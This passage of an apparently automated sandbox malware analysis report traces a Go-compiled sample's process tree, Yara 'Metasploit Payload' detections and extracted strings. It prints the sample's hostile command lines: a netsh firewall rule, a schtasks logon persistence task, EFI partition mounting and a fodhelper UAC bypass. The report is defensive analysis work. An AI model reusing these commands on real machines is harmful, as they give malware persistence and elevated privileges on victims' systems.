                                                                                                                              • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000000C.00000002.324236877.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000000C.00000002.327502514.00000000051A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                              Reputation:low

                                                                                                                              General

                                                                                                                              Start time:20:35:11
                                                                                                                              Start date:11/11/2021
                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                              Imagebase:0x7ff70d6e0000
                                                                                                                              File size:51288 bytes
                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high

                                                                                                                              General

                                                                                                                              Start time:20:35:18
                                                                                                                              Start date:11/11/2021
                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                                                                                                                              Imagebase:0x7ff7fa260000
                                                                                                                              File size:273920 bytes
                                                                                                                              MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high

                                                                                                                              General

                                                                                                                              Start time:20:35:19
                                                                                                                              Start date:11/11/2021
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff7f20f0000
                                                                                                                              File size:625664 bytes
                                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high

                                                                                                                              General

                                                                                                                              Start time:20:35:19
                                                                                                                              Start date:11/11/2021
                                                                                                                              Path:C:\Windows\System32\netsh.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                                                                                                              Imagebase:0x7ff638640000
                                                                                                                              File size:92672 bytes
                                                                                                                              MD5 hash:98CC37BBF363A38834253E22C80A8F32
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                              General

                                                                                                                              Start time:20:35:20
                                                                                                                              Start date:11/11/2021
                                                                                                                              Path:C:\Windows\rss\csrss.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:C:\Windows\rss\csrss.exe /301-301
                                                                                                                              Imagebase:0x400000
                                                                                                                              File size:4534824 bytes
                                                                                                                              MD5 hash:430E6667D7609792F43EF40150050E19
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000011.00000003.333882366.000000000638A000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000011.00000002.555649640.0000000005700000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000011.00000002.549328827.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                              Antivirus matches:
                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                              • Detection: 25%, ReversingLabs

                                                                                                                              General

                                                                                                                              Start time:20:35:21
                                                                                                                              Start date:11/11/2021
                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                              Imagebase:0x7ff70d6e0000
                                                                                                                              File size:51288 bytes
                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                              General

                                                                                                                              Start time:20:35:21
                                                                                                                              Start date:11/11/2021
                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 5384 -ip 5384
                                                                                                                              Imagebase:0x20000
                                                                                                                              File size:434592 bytes
                                                                                                                              MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                              General

                                                                                                                              Start time:20:35:22
                                                                                                                              Start date:11/11/2021
                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5384 -s 996
                                                                                                                              Imagebase:0x20000
                                                                                                                              File size:434592 bytes
                                                                                                                              MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                              General

                                                                                                                              Start time:20:35:28
                                                                                                                              Start date:11/11/2021
                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                              Imagebase:0x7ff70d6e0000
                                                                                                                              File size:51288 bytes
                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                              General

                                                                                                                              Start time:20:35:29
                                                                                                                              Start date:11/11/2021
                                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                                                                                                              Imagebase:0x7ff6cdd90000
                                                                                                                              File size:226816 bytes
                                                                                                                              MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                              General

                                                                                                                              Start time:20:35:29
                                                                                                                              Start date:11/11/2021
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff7f20f0000
                                                                                                                              File size:625664 bytes
                                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                              General

                                                                                                                              Start time:20:35:29
                                                                                                                              Start date:11/11/2021
                                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:schtasks /delete /tn ScheduledUpdate /f
                                                                                                                              Imagebase:0x7ff6cdd90000
                                                                                                                              File size:226816 bytes
                                                                                                                              MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                              General

                                                                                                                              Start time:20:35:30
                                                                                                                              Start date:11/11/2021
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff7f20f0000
                                                                                                                              File size:625664 bytes
                                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                              General

                                                                                                                              Start time:20:35:30
                                                                                                                              Start date:11/11/2021
                                                                                                                              Path:C:\Windows\SysWOW64\mountvol.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:mountvol B: /s
                                                                                                                              Imagebase:0x1f0000
                                                                                                                              File size:15360 bytes
                                                                                                                              MD5 hash:5C11B99E6D41403031CD946255E8A353
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                              General

                                                                                                                              Start time:20:35:30
                                                                                                                              Start date:11/11/2021
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff7f20f0000
                                                                                                                              File size:625664 bytes
                                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                              General

                                                                                                                              Start time:20:35:31
                                                                                                                              Start date:11/11/2021
                                                                                                                              Path:C:\Windows\SysWOW64\mountvol.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:mountvol B: /d
                                                                                                                              Imagebase:0x1f0000
                                                                                                                              File size:15360 bytes
                                                                                                                              MD5 hash:5C11B99E6D41403031CD946255E8A353
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                              General

                                                                                                                              Start time:20:35:31
                                                                                                                              Start date:11/11/2021
                                                                                                                              Path:C:\Windows\rss\csrss.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:C:\Windows\rss\csrss.exe
                                                                                                                              Imagebase:0x400000
                                                                                                                              File size:4534824 bytes
                                                                                                                              MD5 hash:430E6667D7609792F43EF40150050E19
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000001F.00000003.374819187.000000000638A000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000001F.00000002.404110892.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000001F.00000002.410184897.0000000005700000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                              General

                                                                                                                              Start time:20:35:32
                                                                                                                              Start date:11/11/2021
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff7f20f0000
                                                                                                                              File size:625664 bytes
                                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                              General

                                                                                                                              Start time:20:35:32
                                                                                                                              Start date:11/11/2021
                                                                                                                              Path:C:\Windows\rss\csrss.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Windows\rss\csrss.exe"
                                                                                                                              Imagebase:0x400000
                                                                                                                              File size:4534824 bytes
                                                                                                                              MD5 hash:430E6667D7609792F43EF40150050E19
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000021.00000003.363027813.000000000638A000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000021.00000002.416342810.0000000005700000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000021.00000002.401387176.0000000000400000.00000040.00020000.sdmp, Author: Joe Security

                                                                                                                              General

                                                                                                                              Start time:20:35:32
                                                                                                                              Start date:11/11/2021
                                                                                                                              Path:C:\Windows\SysWOW64\mountvol.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:mountvol B: /s
                                                                                                                              Imagebase:0x1f0000
                                                                                                                              File size:15360 bytes
                                                                                                                              MD5 hash:5C11B99E6D41403031CD946255E8A353
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                              General

                                                                                                                              Start time:20:35:36
                                                                                                                              Start date:11/11/2021
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff7f20f0000
                                                                                                                              File size:625664 bytes
                                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                              General

                                                                                                                              Start time:20:35:38
                                                                                                                              Start date:11/11/2021
                                                                                                                              Path:C:\Windows\SysWOW64\mountvol.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:mountvol B: /d
                                                                                                                              Imagebase:0x1f0000
                                                                                                                              File size:15360 bytes
                                                                                                                              MD5 hash:5C11B99E6D41403031CD946255E8A353
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                              General

                                                                                                                              Start time:20:35:39
                                                                                                                              Start date:11/11/2021
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff7f20f0000
                                                                                                                              File size:625664 bytes
                                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                              General

                                                                                                                              Start time:20:35:40
                                                                                                                              Start date:11/11/2021
                                                                                                                              Path:C:\Windows\SysWOW64\shutdown.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:shutdown -r -t 5
                                                                                                                              Imagebase:0x1130000
                                                                                                                              File size:23552 bytes
                                                                                                                              MD5 hash:E2EB9CC0FE26E28406FB6F82F8E81B26
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                              General

                                                                                                                              Start time:20:35:40
                                                                                                                              Start date:11/11/2021
                                                                                                                              Path:C:\Windows\rss\csrss.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Windows\rss\csrss.exe"
                                                                                                                              Imagebase:0x400000
                                                                                                                              File size:4534824 bytes
                                                                                                                              MD5 hash:430E6667D7609792F43EF40150050E19
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000027.00000003.375600027.000000000638A000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000027.00000002.415953009.0000000005700000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                              General

                                                                                                                              Start time:20:35:41
                                                                                                                              Start date:11/11/2021
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff7f20f0000
                                                                                                                              File size:625664 bytes
                                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                              General

                                                                                                                              Start time:20:35:43
                                                                                                                              Start date:11/11/2021
                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\Sysnative\cmd.exe /C fodhelper
                                                                                                                              Imagebase:0x7ff7fa260000
                                                                                                                              File size:273920 bytes
                                                                                                                              MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                              General

                                                                                                                              Start time:20:35:43
                                                                                                                              Start date:11/11/2021
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff7f20f0000
                                                                                                                              File size:625664 bytes
                                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                              General

                                                                                                                              Start time:20:35:43
                                                                                                                              Start date:11/11/2021
                                                                                                                              Path:C:\Windows\System32\fodhelper.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:fodhelper
                                                                                                                              Imagebase:0x7ff7644f0000
                                                                                                                              File size:46080 bytes
                                                                                                                              MD5 hash:1D1F9E564472A9698F1BE3F9FEB9864B
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                              General

                                                                                                                              Start time:20:35:44
                                                                                                                              Start date:11/11/2021
                                                                                                                              Path:C:\Windows\System32\fodhelper.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Windows\system32\fodhelper.exe"
                                                                                                                              Imagebase:0x7ff7644f0000
                                                                                                                              File size:46080 bytes
                                                                                                                              MD5 hash:1D1F9E564472A9698F1BE3F9FEB9864B
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                              General

                                                                                                                              Start time:20:35:47
                                                                                                                              Start date:11/11/2021
                                                                                                                              Path:C:\Windows\System32\fodhelper.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Windows\system32\fodhelper.exe"
                                                                                                                              Imagebase:0x7ff7644f0000
                                                                                                                              File size:46080 bytes
                                                                                                                              MD5 hash:1D1F9E564472A9698F1BE3F9FEB9864B
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                              General

                                                                                                                              Start time:20:35:48
                                                                                                                              Start date:11/11/2021
                                                                                                                              Path:C:\Windows\rss\csrss.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:C:\Windows\rss\csrss.exe
                                                                                                                              Imagebase:0x400000
                                                                                                                              File size:4534824 bytes
                                                                                                                              MD5 hash:430E6667D7609792F43EF40150050E19
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000032.00000003.433190112.000000000638A000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000032.00000002.437840695.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000032.00000002.441852613.0000000005700000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                              General

                                                                                                                              Start time:20:35:48
                                                                                                                              Start date:11/11/2021
                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\Sysnative\cmd.exe /C fodhelper
                                                                                                                              Imagebase:0x7ff7fa260000
                                                                                                                              File size:273920 bytes
                                                                                                                              MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                              General

                                                                                                                              Start time:20:35:49
                                                                                                                              Start date:11/11/2021
                                                                                                                              Path:C:\Windows\rss\csrss.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Windows\rss\csrss.exe"
                                                                                                                              Imagebase:0x400000
                                                                                                                              File size:4534824 bytes
                                                                                                                              MD5 hash:430E6667D7609792F43EF40150050E19
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000034.00000003.403303463.000000000638A000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000034.00000002.415283023.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000034.00000002.423136850.0000000005700000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                              Disassembly

                                                                                                                              Code Analysis

                                                                                                                              Reset < >

                                                                                                                                Executed Functions

                                                                                                                                Non-executed Functions

                                                                                                                                Strings
                                                                                                                                • VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcouldn't delete an exclusion valuecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu, xrefs: 00428CF0
                                                                                                                                • ,-./01456:;<=>?@BCLMNOPSZ["\, xrefs: 00428C50
                                                                                                                                • bad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegcentersyscallexit status found av: %sgcpacert, xrefs: 00428C95
                                                                                                                                • runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtime: unknown unit too many open filesunexpected InstFailunexpected data: %vunknown Go type: %vunknown certi, xrefs: 00428C26
                                                                                                                                • ", xrefs: 00428CF9
                                                                                                                                • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:, xrefs: 00428CBC
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.294589443.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.297211806.00000000009F9000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 00000000.00000002.297648317.0000000000C51000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 00000000.00000002.297655834.0000000000C55000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 00000000.00000002.297715236.0000000000CA8000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 00000000.00000002.297721527.0000000000CB6000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 00000000.00000002.297725974.0000000000CB9000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 00000000.00000002.297729751.0000000000CBB000.00000040.00020000.sdmp Download File
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: "$,-./01456:;<=>?@BCLMNOPSZ["\$VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcouldn't delete an exclusion valuecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu$bad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegcentersyscallexit status found av: %sgcpacert$runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:$runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtime: unknown unit too many open filesunexpected InstFailunexpected data: %vunknown Go type: %vunknown certi
                                                                                                                                • API String ID: 0-2405844374
                                                                                                                                • Opcode ID: de3a2cf2d3909c46a913fbbc00b11d99987c1667a54191d7621522a8055b41fa
                                                                                                                                • Instruction ID: 42ee82367b21563e109480012d6fe3560eb94324b5bc2d8460cea0574e50dfb9
                                                                                                                                • Opcode Fuzzy Hash: de3a2cf2d3909c46a913fbbc00b11d99987c1667a54191d7621522a8055b41fa
                                                                                                                                • Instruction Fuzzy Hash: E851F5B46097158FD340EF65D18575EBBE0BF88708F818A2EF48887352DB389948DB96
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                • m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/api/report/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat, xrefs: 004347C4
                                                                                                                                • m->p= next= p->m= prev= span=%s: %s(...), not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCA, xrefs: 00434778
                                                                                                                                • releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/br, xrefs: 00434852
                                                                                                                                • releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau, xrefs: 00434756
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.294589443.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.297211806.00000000009F9000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 00000000.00000002.297648317.0000000000C51000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 00000000.00000002.297655834.0000000000C55000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 00000000.00000002.297715236.0000000000CA8000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 00000000.00000002.297721527.0000000000CB6000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 00000000.00000002.297725974.0000000000CB9000.00000040.00020000.sdmp Download File
                                                                                                                                • Associated: 00000000.00000002.297729751.0000000000CBB000.00000040.00020000.sdmp Download File
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
